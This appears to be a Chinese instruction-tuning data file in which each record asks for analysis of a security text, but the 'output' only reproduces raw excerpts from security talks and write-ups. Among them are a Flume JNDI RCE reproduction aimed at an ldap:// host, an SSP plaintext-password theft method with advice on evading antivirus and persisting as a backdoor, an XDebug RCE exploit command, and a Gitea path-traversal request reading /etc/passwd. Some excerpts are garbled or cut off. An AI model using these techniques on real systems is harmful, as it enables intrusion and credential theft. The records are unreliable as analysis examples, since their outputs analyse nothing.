{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCollaborative Penetration Testing With Lair About Us  Tom Steele  Consultant at FishNet Security  @_tomsteele  Dan Kottmann  Consultant at FishNet Security  Security assessments  Hobbyist coder  @djkottmann The Problem Lair What is Lair  Web application for managing and tracking the execution of network assessments  Simplifies effort needed to execute a comprehensive, systematic pentest  Open-source project sponsored by FishNet Security  Imports , aggregates, and normalizes output from automated tools Why is it different?  Updates pushed to distributed testers in near real-time (really real-time, no really)  Reduces duplication of effort  Workflow  Status tracking  Enhances information sharing  Credentials/hashes found  Manually identified vulnerabilities  Successful exploitation  False positives  Screenshots  Team Instant Messaging Technology  Web application built on Node.js and Meteor  Simplifies real-time synchronization of information across multiple, distributed clients  Pub/sub concept  No need to fight web sockets  Python used for Drones  MongoDb used for database backend Architecture Long Demo Now Download it https://bitbucket.org/fnsseca/lair", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON XXI How my Botnet Purchased Millions of Dollars in Cars & Defeated the Russian Hackers I want to tell you a story about...  Hacking  Cars  Russian Hackers  Screwing with the system I want to tell you a story about...  Commercial Botnets  Creating competitive advantages  Not using technology as directed What you'll learn  What makes a good Botnet / Webbot project?  How Bots create competitive advantages for business (example)  What I would do differently today (the example happened 6 years ago) What makes a good Bot project?  The Bot...  Can't recreate Google  Must solve a problem  Be viable for it's service life  Doesn't show it's hand I have permission to tell this story.  It's rare that I get to mention specific projects.  I've been writing about bots since 1999  Medical diagnostics  Privacy  Fraud detection  Private investigations  Governments So the 1st thing I did, was write this.. PLAYING NICE WITH INTERNET ATTACK TECHNIQUES UK Nov 2012 US Dec 2012 The Problem to be Solved  Dealerships that sell new cars make most of their money on used vehicles.  Automobile dealers spend a lot of time & money acquiring (previously owned) inventory.  A client found a website that had great cars for sale.  Unfortunately, due a lot of competition (and bad web design) he wasn't able to buy the cars he wanted. The Opportunity  Daily, a national franchise posted about 300 rental returns for dealerships to purchase.  They could view the cars before the sale.  No car could be purchased before 10AM PDT. The Opportunity MAKE Hudson MODEL 112 Coupe YEAR 1938 MILES 47,000 CONDITION Excellent PRICE $18,500 MAKE Hudson MODEL 112 Coupe YEAR 1938 MILES 47,000 CONDITION Excellent PRICE $18,500 Before 10:00am After 10:00am The Opportunity MAKE Hudson MODEL 112 Coupe YEAR 1938 MILES 47,000 CONDITION Excellent PRICE $18,500 MAKE Hudson MODEL 112 Coupe YEAR 1938 MILES 47,000 CONDITION Excellent PRICE $18,500 Before 10:00am After 10:00am Users had to continually refresh their browser to get", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTCP/IP Fundamentals for Microsoft Windows Microsoft Corporation Published: May 21, 2006 Updated: Jan 9, 2012 Author: Joseph Davies Editor: Anne Taussig Abstract This online book is a structured, introductory approach to the basic concepts and principles of the Transmission Control Protocol/Internet Protocol (TCP/IP) protocol suite, how the most important protocols function, and their basic configuration in the Microsoft Windows Vista, Windows Server 2008, Windows XP, and Windows Server 2003 families of operating systems. This book is primarily a discussion of concepts and principles to lay a conceptual foundation for the TCP/IP protocol suite and provides an integrated discussion of both Internet Protocol version 4 (IPv4) and Internet Protocol version 6 (IPv6). The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This content is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS DOCUMENT. Complying with all applicable copyright laws is the responsibility of the user. The terms of use of this document can be found at http://www.microsoft.com/info/cpyright.mspx. Microsoft may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this document. Except as expressly provided in any written license agreement from Microsoft, the furnishing of this document does not give you any license to these patents, trademarks, copyrights, or other intellectual property. Unless otherwise noted, the example companies, organizations, products, domain names, e-mail addresses, logos, people, places, and events depict", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-34916 JNDI命令执 执漏洞 H1 H2 项介绍 Flume 是种分布式可靠且可的服务于效收集聚合和移动量志数据它具 有基于流数据流的简单灵活的架构它具有可调整的可靠性机制以及许多故障转移和恢复机 制具有健壮性和容错性它使允许在线分析应程序的简单可扩展数据模型 H2 项地址 https://flume.apache.org/ H2 漏洞概述 当攻击者控制标 LDAP 服务器时如果配置使带有 JNDI LDAP 数据源 URI 的 JMS 源 Apache Flume 版本 1.4.0 到 1.10.0 很容易受到远程代码执 (RCE) 攻击通过将 JNDI 限 制为仅允许使 java 协议或不使协议来解决此问题[1] H2 影响版本 Apache Flume 1.4.0-1.10.0 H2 环境搭建 下载部署即可 https://archive.apache.org/dist/flume/1.10.0/ H2 漏洞复现 该漏洞需要使 JNDI具辅助复现可使 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 具 具链接 https://github.com/welk1n/JNDI-Injection-Exploit 命令如下所示 终端开启监听搭建 Flume 项以 jdk1.8 环境运 TestIntegrationActiveMQ 测试类即可 漏洞分析 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C \"open -a calculator\" H2 漏洞分析 查看 commit 能发现新增的校验为了拦截进 else 的 initialContext.lookup(destinationName)这就是这个漏洞的Sink点 查看该 if-else 判断 destinationLocator 等于 JMSDestinationLocator.CDI上溯检查类参数 TestJMSMessageConsumer#testCreateDurableSubscription 初始化了 JMSMessageConsumer 并传 destinationLocator JMSMessageConsumer(...... String destinationName, JMSDestinationLocator destinationLocator ...... destinationLocator 的定义如下所示为了进 JMSMessageConsumer 的 else 循环需要 修改该变量为 JNDI destinationName 由 DESTINATION_NAME 定义需要改为具开启的 ldap链接 JNDI_PREFIX 改为 ldap:// destinationLocator = JMSDestinationLocator.CDI; //改为 jndi 即可 destinationLocator = JMSDestinationLocator.JNDI; //private static final String DESTINATION_NAME = \"test\"; private static final String DESTINATION_NAME = \"x.x.x.x:1389/iq9wuv\"; //public static final String JNDI_PREFIX = \"dynamicQueues/\"; public static final String JNDI_PREFIX = \"ldap://\"; 该项需要使官提供的Test类作为 source点传参数Test类中只有 TestIntegrationActiveMQ 类存在 testQueueLocatedWithJndi CFG如下所示 按漏洞复现步骤进复现测试即可 H2 修复式 升级到更版本 参考链接 H2 参考链接 [1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34916 [2] https://issues.apache.org/jira/browse/FLUME-3428 [3] https://github.com/apache/flume/commit/7fe9af49c485756e1b618493a5bc00b70d7fb d2d [4] https://lists.apache.org/thread/qkmt4r2t9tbrxrdbjg1m2oczbvczd9zn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsol = [202, 242, 238, 32, 245, 238, 247, 229, 242, 32, 236, 237, 238, 227, 238, 32, 231, 237, 224, 242, 252, 44, 32, 242, 238, 236, 243, 32, 236, 224, 235, 238, 32, 241, 239, 224, 242, 252, 46, 0] s = open(\"emulator\", \"rb\").read() s = s[s.find(b\"\\xd0\\x82\\x00\"):] s = s.split(b\"\\x00\\x00\\x00\")[0].split(b\"\\x00\") charset = [] for ss in s: try: sss = ss.decode() except: sss = \"???\" charset.append(sss) def get(c): print(c) if c < 128: return chr(c) else: return charset[c-128] print(\"\".join(get(c) for c in sol))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStalking a City for Fun and Frivolity Pull pin, point toward privacy insurance claimant Brendan OConnor Malice Afterthought, Inc. http://www.maliceafterthought.com Everything leaks too much data. At every level, weve forgotten that privacy, not just security, should be a goal. It is no longer possible to blend in to the crowd. Certain assumptions, and many action movies, will have to be adjusted. Every scene where an action hero dives into a mall with 10K people and the Feds say dang, we lost him? Yeah, that wont work anymore. Fundamental changes are needed to fix this. So were probably doomed. But its going to be a fun time in the interim. And I mean both technical changes---more on this later---and cultural ones: it needs to *NOT* be OK to request too much data, let alone to store it or transmit it. And I say this as someone who has worked on software that millions of people use EVERY DAY: we *cannot* leak private data, or we have lost the only thing we do better than our adversaries, and the only reason anyone should trust developers. Foreword: Democratizing Surveillance http://www.flickr.com/photos/68979377@N00/3745750194 I. Foreword: The Democratization of Surveillance A. \"Security is really the government's area.\" 1. This was actually said to me by my sister recently, indicating that I'm failing in my duty to educate my family. 2. Those of us in this room know that the government isn't very good at securing things by means *other* than throwing them in prison for large amounts of time. 3. Nonetheless, the government has a near-monopoly on surveillance. Only the Good Guys http://www.flickr.com/photos/chberge/3753079527 4. When it doesn't, the perception of the general public is that \"only good guys\" have access to terrifying surveillance technology. This is *our fault* for not correcting this misperception, though groups reporting on, e.g., all the BlueCoat boxes they've found in repressive governments are certainly helping. Heck, PRISM was leaked, and this is *st", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@EyalItkin Mystery Callback No size check: Classic Buffer Overflow 0x000022B6 0x000022B6 Compromised Camera Firmware Update Compromised Camera Firmware Update Compromised Camera Firmware Update Plain Firmware Compromised Camera Firmware Update Plain Firmware Malicious Firmware Compromised Camera Firmware Update Plain Firmware Malicious Firmware Compromised Camera Firmware Update Plain Firmware Malicious Update Malicious Firmware Target Camera Malicious Update Compromised Camera Firmware Update Plain Firmware Malicious Update Malicious Firmware Target Camera Malicious Update No User interaction Needed! Compromised Camera Firmware Update Plain Firmware Malicious Update Malicious Firmware Malicious Update Compromised Camera! No User interaction Needed! Compromised Camera Firmware Update Plain Firmware Malicious Update Malicious Firmware Compromised Camera Firmware Update Plain Firmware Malicious Update Malicious Firmware Target Camera Malicious Update Compromised Camera! No User interaction Needed! eyalit@checkpoint.com @EyalItkin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzing Linux with Xen DEF CON 29 Tamas K Lengyel 2 dont microwave your pets Performance varies by use, configuration and other factors. Learn more at www.Intel.com/PerformanceIndex. Performance results are based on testing as of dates shown in configurations and may not reflect all publicly available updates. See backup for configuration details. No product or component can be absolutely secure. No license (express or implied, by estoppel or otherwise) to any intellectual property rights is granted by this document. Intel does not control or audit third-party data. You should consult other sources to evaluate accuracy. Intel disclaims all express and implied warranties, including without limitation, the implied warranties of merchantability, fitness for a particular purpose, and non-infringement, as well as any warranty arising from course of performance, course of dealing, or usage in trade. Your costs and results may vary. Intel technologies may require enabled hardware, software or service activation.  Intel Corporation. Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries. Other names and brands may be claimed as the property of others.  # whoami 4 tl;dr We fuzzed the device-facing input points of several Linux drivers We built new tools to get it done We open-sourced them We found a bunch of bugs & fixed them Showing you how it was done 5 feedback fuzzers Not just about feeding random input to your target Feedback fuzzers monitor the target execution Collect execution log (aka. coverage) Compare execution from run-to-run New code discovered? Focus on that input! 6 feedback fuzzers Need determinism If your target code behaves differently between executions not due to the fuzzer, the feedback will be just noise 7 xen vm forking Add determinism to kernel-code execution Reset vCPU registers and free copied pages for better speed Parent VM  Page X Page Y Page Z  Fork VM  Shared Page X Copied Page Y Shared Page Z  R W ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 信息 `记录收集 Linux 系统软硬件信息的命令` --- ## 大纲 * **[软件](#软件)** * [版本信息](#版本信息) * [环境变量](#环境变量) * [开机启动](#开机启动) * [日志](#日志) * [应用服务](#应用服务) * [用户相关](#用户相关) * **[硬件](#硬件)** * [CPU](#CPU) * [内存](#内存) * [时间负载](#时间负载) * [网络](#网络) * [硬盘文件系统](#硬盘文件系统) --- ## 软件 ### 版本信息 ```bash hostname # 查看服务器主机名命令 cat /etc/*-release # 查看通用 Linux 发行版版本 cat /etc/lsb-release # Debian based cat /etc/issue # 查看 Ubuntu Debian 系发行版版本命令 cat /etc/redhat-release # 查看 CentOS RedHat 系发行版版本命令 cat /proc/version # 查看系统版本 ``` **内核信息** ```bash uname -r # 查看内核版本 uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- ``` --- ### 环境变量 ```bash cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set export # 查看所有环境变量 ``` --- ### 开机启动 ```bash chkconfig # 查看开机启动服务命令 ls /etc/init.d # 查看开机启动配置文件命令 cat /etc/rc.local # 查看 rc 启动文件 ``` ### 定时任务 ```bash crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root ``` --- ### 日志 ```bash cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log # 存储来自可插拔认证模块(PAM)的日志包括成功的登录失败的登录尝试和认证方式 cat /var/log/chttp.log cat /var/log/cups/error_log # 记录打印信息日志的报错信息 cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog # 记录系统中所有用户最后一次登录时间的日志这个文件是二进制文件可以使用 lastlog 命令查看 cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages # 核心系统日志文件包含系统启动引导系统运行状态和大部分错误信息等都会记录到这个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAttacking .Net Applications At Runtime By: Jon McCoy Abstract This paper will introduce methodology for attacking .NET programs at Runtime. This attack will grant control over the targets variables, core logic, and the GUI. This attack is implemented with .NET code, and is heavily based on reflection. This paper has a C# implementation of this attack: DotNetSpike Introduction This attack can navigate and control a live program by using the rules of the Runtime system to control other .NET applications. Some rules can be bent others can be broken. Once access to another programs Runtime is gained almost absolute control is at hand. Most every aspect from Objects to Events can be accessed, and most of the time modified. This allows for simple attacks like changing an Objects values or calling functionality, and more complex attacks like introducing or changing the basic logic of the target can be done with ease. With this level of control the target can be forced to divulge protected information, carry out subverted functionality and send corrupted signals. This attack will also allow for accessing the code base and Object structure live. This platform can allow an attack to be developed and implemented in a matter of minutes or hours. Once inside of the target program the necessary references need to be found, and then full power of .NET can be used. After gaining all the references it can be a matter of changing one variable or introducing one line of code to subvert a program's logic. Access Live .NET Program The first step is to establish a connection inside of the targets Runtime; this is done in a number of ways. This can range from compromising the .NET Framework 1 to exploiting a glitch in a specific application. Each method of accessing another applications Runtime has a different impact on stability, foot print and security alerts. Also the method of entry used will change what references are at hand and what if any constraints will be imposed. The method of", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n不修改注册表获取 windows 明文密码的若干姿势之 SSP 一 SSP 的作用 Security Support Providers 是一个提供约定回调函数的 dll向系统注册了 SSP 后系统在认证 过程中就会调用此 dll 中的某些函数SSP 必须导出的函数如下 SpLsaModeInitialize SpInitialize SpGetInfo SpShutDown SpAcceptCredentials 在这里我们只需要关心 SpAcceptCredentials 这个回调函数正如名字描述的一 样此函数在系统认证过程中会接收到用户输入的账密我们只需要记录下来就 可以拿到用户的明文账密mimilib 已经贴心地给我们实现了这个功能 二向系统注册我们的 SSP 在此引出 AddSecurityPackage 这个 windows API. MSDN 上对此 API 的功能描述是 Adds a security support provider to the list of providers supported by Microsoft Negotiate. 具体的功能就是让系统去主动加载我们的 SSP在系统认证过程中调用我们的 SPP 里面的回调 与其他获取明文密码的姿势相比 SSP 具有以下优势 这是 windows 提供的功能较为隐蔽 不用直接读写 Lsass 进程内存绕过了 AV 的防护 不需要写注册表和让目标机器重启立即生效 三 验证 环境win10 1909 x64. Windows defender 功能全开 1. 注册 SSP让系统加载 此时 SSP 已经被加载无法删除它 2. 触发用户认证SSP 成功地记录到明文账密功能正常 注意点 实战中 mimilib 特征较多务必要做好免杀经测试将明文密码加密编码更加隐蔽容易 过 AV 检测 SSP 会在机器重启后失效若要作为后门来用请做好持久化 四参考&引用 xpn @_xpn_ (这是个贼啦 NB 的大佬) https://blog.xpnsec.com/exploring-mimikatz-part-2/ 里面具体逆向分析和调试过程 干货挺多 MSDN: https://docs.microsoft.com/en-us/windows/win32/api/sspi/nf-sspi-addsecuritypackagew", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAura A peer-to-peer reputation system Cat Okita, 2003 Reputation Systems  What is a Reputation System?  Livejournal/Friendster, eBay, Avogato, Slashcode  Why do you care?  What could you use this for?  Establishing trust, performance metrics, meme propagation, spam filtering Challenges  Authentication  Trust  Non-repudiation Design Considerations  Fast, resource efficient  Secure - Difficult to corrupt information or impersonate others  Portable - Easy to use from any location  Simple to use and extend  Independent - not dependant on a centralized server Attacks  Information poisoning  Flooding  Trojans  Identity theft  Impersonation  DoS Implementation  Peer-to-peer  Can also run in collector mode  Reputation Mode  valuation of entity overall (both personal and general) or per template  Gossip Mode  information about other entities A quick check of Reputation  Picking a mailer  Stable, fast, secure?  Finding out about a poster to a mailing list  Crazy, expert, unknown? Configuration  Text-based configuration  Templates for details  Requires use of public key Future Plans  Pretty GUI  Better cross-platform portability  Improved statistical reporting  Implementation of group keys  Trigger automation Finis  Available at:  http://www.geekness.net/tools/aura  Email to:  aura@geekness.net  Questions???", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# investigation_encoded_2 Forensics, 500 points ## Description: > We have recovered a binary and 1 file: image01. See what you can make of it. > NOTE: The flag is not in the normal picoCTF{XXX} format. ## Solution: This is the follow-up challenge for [investigation_encoded_1](investigation_encoded_1.md). The challenges are very similar and therefore we'll only be listing the differences. We start by running the new binary: ```console root@kali:/media/sf_CTFs/pico/investigation_encoded_2# ./mystery Error: file ./flag.txt not found root@kali:/media/sf_CTFs/pico/investigation_encoded_2# echo abcde>flag.txt root@kali:/media/sf_CTFs/pico/investigation_encoded_2# ./mystery Segmentation fault ``` Let's just open it with Ghidra. The main function is: ```c undefined8 main(void) { long lVar1; size_t sVar2; undefined4 local_18; int local_14; FILE *local_10; badChars = '\\0'; local_10 = fopen(\"flag.txt\",\"r\"); if (local_10 == (FILE *)0x0) { fwrite(\"Error: file ./flag.txt not found\\n\",1,0x21,stderr); /* WARNING: Subroutine does not return */ exit(1); } flag_size = 0; fseek(local_10,0,2); lVar1 = ftell(local_10); flag_size = (int)lVar1; fseek(local_10,0,0); login(); if (0xfffe < flag_size) { fwrite(\"Error, file bigger than 65535\\n\",1,0x1e,stderr); /* WARNING: Subroutine does not return */ exit(1); } flag = malloc((long)flag_size); sVar2 = fread(flag,1,(long)flag_size,local_10); local_14 = (int)sVar2; if (local_14 < 1) { /* WARNING: Subroutine does not return */ exit(0); } local_18 = 0; flag_index = &local_18; output = fopen(\"output\",\"w\"); buffChar = 0; remain = 7; fclose(local_10); encode(); fclose(output); if (badChars == '\\x01') { fwrite(\"Invalid Characters in flag.txt\\n./output is corrupted\\n\",1,0x35,stderr); } else { fwrite(\"I\\'m Done, check file ./output\\n\",1,0x1e,stderr); } return 0; } ``` We proceed to `encode()`: ```c void encode(void) { byte bVar1; ulong uVar2; int iVar3; int local_10; char current_char; while (*flag_index < flag_size) { uVar2 = lower(*(byte *)(*flag_index", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# XDebug 远程调试漏洞代码执行 XDebug是PHP的一个扩展用于调试PHP代码如果目标开启了远程调试模式并设置`remote_connect_back = 1` ``` xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 ``` 这个配置下我们访问`http://target/index.php?XDEBUG_SESSION_START=phpstorm`目标服务器的XDebug将会连接访问者的IP或`X-Forwarded-For`头指定的地址并通过dbgp协议与其通信我们通过dbgp中提供的eval方法即可在目标服务器上执行任意PHP代码 更多说明可参考 - https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface - https://xdebug.org ## 测试环境 编译及启动测试环境 ``` docker compose build docker compose up -d ``` 启动完成后访问`http://your-ip:8080/`即可发现主页是一个简单的phpinfo在其中可以找到xdebug的配置可见开启了远程调试 ## 漏洞利用 因为需要使用dbgp协议与目标服务器通信所以无法用http协议复现漏洞 我编写了一个[漏洞复现脚本](exp.py)指定目标web地址待执行的php代码即可 ``` # 要求用python3并安装requests库 python3 exp.py -t http://127.0.0.1:8080/index.php -c 'shell_exec('id');' ``` ![](1.png) **重要说明因为该通信是一个反向连接的过程exp.py启动后其实是会监听本地的9000端口可通过-l参数指定并等待XDebug前来连接所以执行该脚本的服务器必须有外网IP或者与目标服务器处于同一内网**", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Gitea 1.4.0 目录穿越导致命令执行漏洞 Gitea是从gogs衍生出的一个开源项目是一个类似于GithubGitlab的多用户Git仓库管理平台其1.4.0版本中有一处逻辑错误导致未授权用户可以穿越目录读写任意文件最终导致执行任意命令 参考链接 - https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html - https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html ## 漏洞环境 执行如下命令启动启动漏洞环境 ``` docker compose up -d ``` 环境启动后访问`http://you-ip:3000`将进入安装页面填写管理员账号密码并修改网站URL其他的用默认配置安装即可不要修改端口号 安装完成后创建一个公开的仓库随便添加点文件进去比如使用选定的文件和模板初始化仓库 ![](1.png) 然后需要执行一次`docker compose restart`重启gitea服务原因详见第二个参考链接 ## 漏洞复现 由于漏洞链整体利用比较复杂我们只复现文件读取部分剩余利用方法详见第二个参考链接 打开gitea找到刚才创建的公开项目如`vulhub/repo`发送如下数据包添加一个Git LFS对象 ``` POST /vulhub/repo.git/info/lfs/objects HTTP/1.1 Host: your-ip:3000 Accept-Encoding: gzip, deflate Accept: application/vnd.git-lfs+json Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 151 { \"Oid\": \"....../../../etc/passwd\", \"Size\": 1000000, \"User\" : \"a\", \"Password\" : \"a\", \"Repo\" : \"a\", \"Authorization\" : \"a\" } ``` 然后访问`http://your-ip:3000/vulhub/repo.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth`即可看到`/etc/passwd`已被成功读取 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbypass NAT 0x00 portswiggertop-10-web-hacking-techniques-of-2020-nominations-open2020 https://portswigger.net/research/top-10-web-hacking-techniques-of-2020-nominations-open https://samy.pl/slipstream/ NATslipstreaming nat nat rrrrrr 0x01 nat slipstreamhttps://samy.pl/slipstream/ https://forum.butian.net/share/88 github2009https://github.com/rtsisyk/linux-iptables-contrack-exploit nf_conntrackhttps://clodfisher.github.io/2018/09/nf_conntrack/ iptables sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT inputESTABLISHEDtcpubuntu https://help.ubuntu.com/community/IptablesHowTo ESTABLISHEDtcp inputtcpRELATEDALG ALGFTPRELATEDALG TCPTCP ALGwiki ALGNAT2010 nat slipstreamSIPFTP SIP 1. SIP 2. 3. jspost 4. MTUpostSIP 5. SIPRELATED 0x02 FTP ALG SIPSIPFTP iptablesFTP FTPALG 1. nf_conntrack 2. nf_conntrack_ftp 3. inputrelated nf_xxxLinuxubuntu20 nf_conntrack_ftpftpALGLinux ubuntu20 FTP https://www.cnblogs.com/mawanglin2008/articles/3607767.html FTP USER admin PASS admin PORT 127,0,0,1,0,22 port portip8848 0x22900x220x9034,144127.0.0.18848 PORT 127,0,0,1,34,144 EPRT |1|127.0.0.1|8848| payloadport 0x03 1. TCP 2. 3. SSRFSSRFSSRF SSRF SSRFSSRF GET nf_conntrack_ftp 1. ESTABLISHED 2. 3. TCP PAYLOAD 4. PORTEPRT 5. 6. 21 httptcp http tcp flagpush1pushtcphttptcp tcptcppush HTTPSSRF 1. gophergophertcppayloadpush 2. 30xhttp30x30x payloadPORThttpGETPOST 3. pipelinepipelinepipeline 4. httppushhttptrunk 0x04 http curl -X POST -T x.txt http://xxx.xxx.xxx.xxx:21 postpush 1 1post Expect: 100-continue https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Status/100 post bodyExpectpost body post bodypushtcp SSRF curl -X POST -T x.txt http://xxx.xxx.xxx.xxx:21 phpcurl https://gist.github.com/perusio/1724301 phpcurlpost1024expect php post 1. body1024 2. 3. phpdemo <?php for ($i=0; $i < 1; $i++) { echo \"$i\"; request(\"http://172.28.64.142:21\"); } function request($url) { $requestData = \"EPRT |1|172.28.64.19|8848", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRFID Hacking Live Free or RFID Hard 03 Aug 2013  DEF CON 21 (2013)  Las Vegas, NV Presented by: Francis Brown Bishop Fox www.bishopfox.com Agenda 2  Quick Overview  RFID badge basics  Hacking Tools  Primary existing RFID hacking tools  Badge stealing, replaying, and cloning  Attacking badge readers and controllers directly  Planting Pwn Plugs and other backdoors  Custom Solution  Arduino and weaponized commercial RFID readers  Defenses  Protecting badges, readers, controllers, and more O V E R V I E W Introduction/Background 3 GETTING UP TO SPEED Badge Basics 4 Name Frequency Distance Low Fequency (LF) 120kHz  140kHz <3ft (Commonly under 1.5ft) High Frequency (HF) 13.56MHz 3-10 ft Ultra-High-Frequency (UHF) 860-960MHz (Regional) ~30ft F R E Q U E N C I E S Legacy 125kHz 5 S T I L L K I C K I N 80%  Legacy 125-kilohertz proximity technology is still in place at around 70% to 80% of all physical access control deployments in the U.S. and it will be a long time - Stephane Ardiley, HID Global.  There is no security, theyve been hacked, theres no protection of data, no privacy, everything is in the clear and its not resistant to sniffing or common attacks. Opposite of Progress 6 T A L K M O T I V A T I O N S 2007 2013 HID Global - Making the Leap from Prox to Contactless ID Cards https://www.hidglobal.com/blog/making-leap-prox-contactless-id-cards How a Card Is Read 7 P O I N T S O F A T T A C K Card Reader Controller Wiegand output Host PC Ethernet Card  Broadcasts 26-37 bit card number Reader  Converts card data to Wiegand Protocol for transmission to the controller  No access decisions are made by reader Controller  Binary card data format is decoded  Makes decision to grant access (or not) Host PC  Add/remove card holders, access privileges  Monitor system events in real time Badge Types 8  The data on any access card is simply a string of binary numbers (ones and zeros) of some fixed configuration and length, used to identify the cardholder  HID makes different type", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUrban Exploration - A Hackers View phreakmonkey (K.C.) mutantMandias (Mandias) phreakmonkey.com Latest Slides: http://phreakmonkey.com/dc16-ue.zip DISCLAIMER Urban Exploration can be dangerous. Trespassing can get you arrested, jailed, or killed. Falling great distances can kill you. Exposure to asbestos, dangerous chemicals, lack of oxygen, fire, electricity, or gang violence may be dangerous to your health. Neither phreakmonkey nor mutantMandias advocate any behavior talked about, written about, photographed, or implied in this presentation. Neither phreakmonkey nor mutantMandias are lawyers, and nothing in this presentation should be construed as legal advice. Neither phreakmonkey or mutantMandias are physicians, and nothing in this presentation should be construed as medical advice. In fact, phreakmonkey and mutantMandias are both full of shit - and nothing in this presentation should be construed as serious advice whatsoever. Background: What is Urban Exploration? Urban Exploration is the practice of discovering, exploring, and often photographing the more off-beat areas of human civilization. This hobby consists of a lot more than just poking about in abandoned buildings and storm drains and hanging out on web boards trying to impress people. Being an urban explorer is a whole way of looking at the world, where every ladder, door, window, grate and hole in the ground is a possible portal to adventure. - Jeff Chapman (Ninjalicious), 2004 What do we explore? Civil Buildings: Hospitals, Schools, Institutions Industrial Buildings: Factories, Transportation Utilities & Infrastructure: Steam Tunnels, Storm Drains, Utility Corridors Residential Hotels, High-rises, Houses (Shanties) Elementary School, Atlanta, GA Prison, Atlanta, GA Paint Factory, Atlanta, GA Rail Car Factory, Atlanta, GA Steam Tunnels, Atlanta, GA Terminology What Hackers Say 'leet, uber homeless person, bum script kiddie exploit, 'sploit What Explorers Say epic urban camper, hobo tourist PoE (point-", "category": "text_analysis", "source": "security_papers"}
